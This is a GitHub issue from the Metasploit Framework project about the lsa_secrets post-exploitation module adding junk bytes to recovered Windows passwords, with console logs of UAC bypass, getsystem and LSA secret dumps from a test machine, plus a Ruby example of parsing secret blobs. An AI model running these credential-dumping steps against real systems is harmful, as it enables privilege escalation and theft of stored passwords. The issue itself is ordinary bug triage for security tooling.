rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

post/windows/gather/lsa_secrets appends junk data to passwords #10390

Open bcoles opened 6 years ago

bcoles commented 6 years ago

A report on Twitter indicates that lsadump on Metasploit is broken.

Initial tests revealed a bug. No idea if it's the same issue, @craigsblackie?

Junk bytes are appended to recovered passwords. Observe the output below. The passwords are password and redacted, whereas the module returns password |\~ and redactedC[+ QE

Test system is Windows 7 SP1 x64, with session upgraded via exploit/windows/local/bypassuac and getsystem. Metasploit is latest version from git, running on Ruby 2.3.0.

msf5 exploit(windows/local/bypassuac) > use post/windows/gather/lsa_secrets 
msf5 post(windows/gather/lsa_secrets) > set session 2
session => 2
msf5 post(windows/gather/lsa_secrets) > run

[*] Executing module against WIN-SGBSD5TQUTQ
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[-] Could not retrieve LSA key. Are you SYSTEM?
[*] Post module execution completed
msf5 post(windows/gather/lsa_secrets) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > 
Background session 2? [y/N]  
msf5 post(windows/gather/lsa_secrets) > run

[*] Executing module against WIN-SGBSD5TQUTQ
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[+] Key: DefaultPassword
 Decrypted Value: password |\~

[+] Key: DPAPI_SYSTEM
 Decrypted Value: ,?<lJ.f$*qghGuf2H

[+] Key: _SC_MSSQL$SQLEXPRESS
 Username: NT Service\MSSQL$SQLEXPRESS 
 Decrypted Value: M"Y=aD

[+] Key: _SC_MSSQLSERVER
 Username: NT Service\MSSQLSERVER 
 Decrypted Value: _;N5kN.

[+] Key: _SC_redacted
 Username: .\redacted 
 Decrypted Value:  redactedC[+ QE

[*] Writing to loot...
[*] Data saved in: /root/.msf4/loot/20180728232749_default_172.16.191.153_registry.lsa.sec_660233.txt
[*] Post module execution completed

Compared to kiwi lsa_dump_secrets, which returns the correct value.

meterpreter > lsa_dump_secrets 
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : WIN-SGBSD5TQUTQ
SysKey : 9f288f41951f8dedc8c2011fcef7627f

Local name : WIN-SGBSD5TQUTQ ( S-1-5-21-3721788700-3134539918-2111365127 )
Domain name : WORKGROUP

Policy subsystem is : 1.11
LSA Key(s) : 1, default {b76bab56-d62d-7863-136e-0a0c1ca4bb73}
  [00] {b76bab56-d62d-7863-136e-0a0c1ca4bb73} 6afee2d5c13d317fe515c521f7c165180feba991f27dd8212d6ce93c68383da0

Secret  : DefaultPassword
cur/text: password
old/text: ROOT#123

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 1d 01 9d 3f 3c 80 6c dc 4a 2e d6 66 24 a0 04 af c2 07 2a d8 71 67 13 99 68 ed 47 75 66 32 b9 12 7f 48 c4 f9 a0 be 04 02 
    full: 1d019d3f3c806cdc4a2ed66624a004afc2072ad87167139968ed47756632b9127f48c4f9a0be0402
    m/u : 1d019d3f3c806cdc4a2ed66624a004afc2072ad8 / 7167139968ed47756632b9127f48c4f9a0be0402
old/hex : 01 00 00 00 c9 22 d6 0b 83 9e dd 98 a7 ad 7a 5a c5 ff 4e bb 8a d2 6f 01 61 be bf d4 bc 70 54 70 fd df 46 12 a8 c5 e5 2d 98 6c 79 71 
    full: c922d60b839edd98a7ad7a5ac5ff4ebb8ad26f0161bebfd4bc705470fddf4612a8c5e52d986c7971
    m/u : c922d60b839edd98a7ad7a5ac5ff4ebb8ad26f01 / 61bebfd4bc705470fddf4612a8c5e52d986c7971

Secret  : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : NT Service\MSSQL$SQLEXPRESS

Secret  : _SC_MSSQLSERVER / service 'MSSQLSERVER' with username : NT Service\MSSQLSERVER

Secret  : _SC_redacted / service 'redacted' with username : .\redacted
cur/text: redacted
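One way the trailing junk shown above can arise (stated here as an assumption, since the issue does not name the cause) is returning every decrypted byte instead of only the bytes covered by the blob's own length field. The Ruby below is an added example, not Metasploit's code, showing a length-checked extractor beside the unchecked behaviour on constructed blobs; HEADER_LEN and the blob layout are taken from the documented LSA secret blob structure and the sample bytes are made up.

```ruby
# Added example (not Metasploit's code): slice a decrypted LSA secret to the
# length its header states, so leftover cipher-block bytes never reach the output.
# Assumed layout of the decrypted blob (the documented LSA secret blob layout):
#   offset 0  : 4-byte little-endian length of the secret
#   offset 4  : 12 header bytes we do not need
#   offset 16 : the secret, `length` bytes long; anything after it is padding
HEADER_LEN = 16

# Exactly the secret bytes, or nil when the blob is too short or the length
# field points past the end (a corrupted or mis-decrypted blob).
def extract_lsa_secret(blob)
  return nil if blob.nil? || blob.bytesize < HEADER_LEN
  length = blob.byteslice(0, 4).unpack('V').first
  return nil if length > blob.bytesize - HEADER_LEN
  blob.byteslice(HEADER_LEN, length)
end

# The behaviour the issue reports, modelled for comparison: everything after
# the header is treated as the secret, padding included.
def extract_lsa_secret_unchecked(blob)
  blob.byteslice(HEADER_LEN, blob.bytesize - HEADER_LEN)
end

# Render for display: DefaultPassword and _SC_* values are UTF-16LE text, while
# DPAPI_SYSTEM is raw key material that must be shown as hex rather than forced
# through a text decoder. "Decodes to printable ASCII" is the (simple) test used.
def secret_to_s(secret)
  return secret.unpack('H*').first if secret.bytesize.odd?
  text = secret.dup.force_encoding('UTF-16LE').encode('UTF-8')
  text.match?(/\A[\x20-\x7e]*\z/) ? text : secret.unpack('H*').first
rescue EncodingError
  secret.unpack('H*').first
end

# Constructed samples, not captured from a real host.
PASSWORD_UTF16 = 'password'.encode('UTF-16LE').b
PADDING        = '#JUNK###'.encode('UTF-16LE').b # 16 leftover bytes after decryption
TEXT_BLOB      = [PASSWORD_UTF16.bytesize].pack('V') + ("\x00" * 12).b + PASSWORD_UTF16 + PADDING
KEY_MATERIAL   = (1..40).map { |i| (i * 37) & 0xff }.pack('C*')
BINARY_BLOB    = [KEY_MATERIAL.bytesize].pack('V') + ("\x00" * 12).b + KEY_MATERIAL + ("\x00" * 8).b

if __FILE__ == $PROGRAM_NAME
  puts "checked:   #{secret_to_s(extract_lsa_secret(TEXT_BLOB))}"           # password
  puts "unchecked: #{secret_to_s(extract_lsa_secret_unchecked(TEXT_BLOB))}" # password#JUNK###
  puts "binary:    #{secret_to_s(extract_lsa_secret(BINARY_BLOB))}"         # hex, not mangled text
end
```

The unchecked path reproduces the symptom in the report (text followed by bytes that are not part of the secret); the checked path also refuses blobs whose length field is inconsistent rather than guessing.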

craigsblackie commented 6 years ago

Yes, this is the same issue I experienced. Should have submitted this myself, thanks for stepping in!

github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

bcoles commented 3 years ago

Removing the stale label. I'm not sure if this is still an issue. Still an issue in 2022. Someone who isn't me should probably take a look at this.